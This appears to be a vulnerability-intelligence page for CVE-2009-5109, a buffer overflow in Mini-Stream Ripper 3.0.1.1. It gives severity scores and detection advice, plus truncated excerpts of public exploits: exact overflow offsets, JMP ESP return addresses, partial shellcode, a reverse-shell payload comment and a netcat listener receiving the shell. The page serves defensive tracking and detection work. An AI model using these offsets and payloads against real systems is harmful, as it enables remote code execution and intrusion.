CVE-2009-5109
published 2011-12-25CVE-2009-5109: Stack-based buffer overflow in Mini-Stream Ripper 3.0.1.1 allows remote attackers to execute arbitrary code via a long entry in a .pls file.
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.82%
98.1th percentile
Stack-based buffer overflow in Mini-Stream Ripper 3.0.1.1 allows remote attackers to execute arbitrary code via a long entry in a .pls file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | ripper | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x53\x93\x42\x7e
bytes↗
\xed\x1e\x94\x7c
bytes↗
\x53\x93\x42\x7e
- →Detect creation or loading of malicious .pls files with oversized entries (>17400 bytes) targeting Mini-Stream Ripper 3.0.1.1; the overflow offset is 17417 bytes before EIP overwrite. ↗
- →Monitor for JMP ESP gadget use at 0x7e429353 (USER32.dll) or 0x7c941eed (SHELL32.dll) as return addresses in stack-based overflow exploitation of Mini-Stream Ripper on Windows XP SP2/SP3. ↗
- →Detect HTTP responses serving .pls files with Content-Type 'application/pls+xml' from exploit frameworks, which may be used to deliver the malicious payload via the URL load feature of Mini-Stream Ripper. ↗
- →Flag .pls files containing a junk buffer of 17403+ repeated bytes (e.g., 0x44 or 0x41) followed by a 4-byte return address, indicative of exploit construction for CVE-2009-5109. ↗
- →The Metasploit module for this CVE uses a payload bad-character set that can help tune IDS/IPS signatures: null bytes and URL-special characters are excluded from shellcode. ↗
- →Detect use of MSRcodec001.dll return address (0x0146b87b) as a universal JMP ESP gadget in .pls exploit files targeting Mini-Stream Ripper. ↗
- ·The JMP ESP return addresses differ between Windows XP SP2 (SHELL32.dll: 0x7c941eed) and SP3 (USER32.dll: 0x7e429353); detection rules targeting specific return addresses must account for both variants. ↗
- ·The Metasploit module uses a StackAdjustment of -3500 and payload space of 3500 bytes; the exploit offset (17417) differs slightly from the standalone PoC (17405), indicating minor variation between exploit implementations. ↗
- ·The universal exploit variant uses a return address from MSRcodec001.dll (0x0146b87b) and a different junk buffer size (26074 bytes), making it distinct from the XP SP2/SP3-specific exploits. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)
exploitdb·2011-11-04
CVE-2009-5109 Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)
Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)
---
##
# $Id: mini_stream.rb 14155 2011-11-04 08:20:43Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CORELAN Security Team ',
'Ron Henry ', # dijital1; Return address update
],
'Version' => '
Exploit-DB
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow
exploitdb·2009-12-29
CVE-2009-5109 Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow
---
#Mini-Stream Ripper v3.0.1.1 Universal BOF !!!
#Discovered by ( mr_me) !!!
#Coded and Written by (Jacky)
#Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team :D
#This time i exploited the program and i used as RET address a Universal one from MSRcodec00.dll
#And i haven't seen anyone using a universal address so i decided to do so ! ;-)
my $file="crash.pls";
print "Mini-Stream Ripper 3.0.1.1 Universal BOF vulnerability\n";
print "Greetz to Peter Van Eeckhoutte and Corelanc0d3r Team\n";
my $junk="A"x26074;
my $eip=pack('V',0x0146b87b); #>>>From MSRcodec001.dll (Universal address ;-) )
my $presc="SEXY"; # 4 Bytes to fill the pre-esp area !
my $esp="\x90"x25;
$esp=$esp."\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x4
Exploit-DB
Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow
exploitdb·2009-12-27
CVE-2009-5109 Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow
Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow
---
#!/usr/bin/python
# ...:| Code Fix/Patch for WinXP - English |:...
# Referenced: http://www.exploit-db.com/exploits/10745 - mr_me
# and fixed the offset as well as tested the exploit against WinXP SP2 and SP3
# Exploit against Mini-Stream 3.0.1.1 WinXP English
# 12.27.2009
# Author: Ron Henry - [email protected] - dijital1
# Version: Mini-Stream 3.0.1.1
# Downloadable from: http://mini-stream.net/
# Tested against WinXP SP2 and SP3 - English
outputfile="astley.pls"
shellcode="\x44"*17403
#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
shellcode+="CAFE"*8 # 32 Byte NOP Sled
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443
Exploit-DB
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow
exploitdb·2009-12-27
CVE-2009-5109 Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow
---
/*
riptheministreamripper.c
Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit
exploited by: mr_me
Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r
Visit: corelanc0d3r's blog http://www.corelan.be:8800/
reference: http://www.exploit-db.com/exploits/10646
Download: http://mini-stream.net/
Tested on: Windows XP sp3
Note: *** For educational purposes only ***
usage:
Compile and execute to create the .pls file and upload it to your favourite server.
Then click on 'LOAD' and then 'URL'. Enter the evil URL, BAM you win.
mrme@backtrack:~$ nc -v 192.168.2.5 4444
192.168.2.5: inverse host lookup failed: Unknown server error : Connection timed
Metasploit
Mini-Stream 3.0.1.1 Buffer Overflow
metasploit
Mini-Stream 3.0.1.1 Buffer Overflow
Mini-Stream 3.0.1.1 Buffer Overflow
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/10745http://www.exploit-db.com/exploits/10747http://www.exploit-db.com/exploits/10782http://www.exploit-db.com/exploits/18082http://www.osvdb.org/61341http://www.exploit-db.com/exploits/10745http://www.exploit-db.com/exploits/10747http://www.exploit-db.com/exploits/10782http://www.exploit-db.com/exploits/18082http://www.osvdb.org/61341
2011-12-25
Published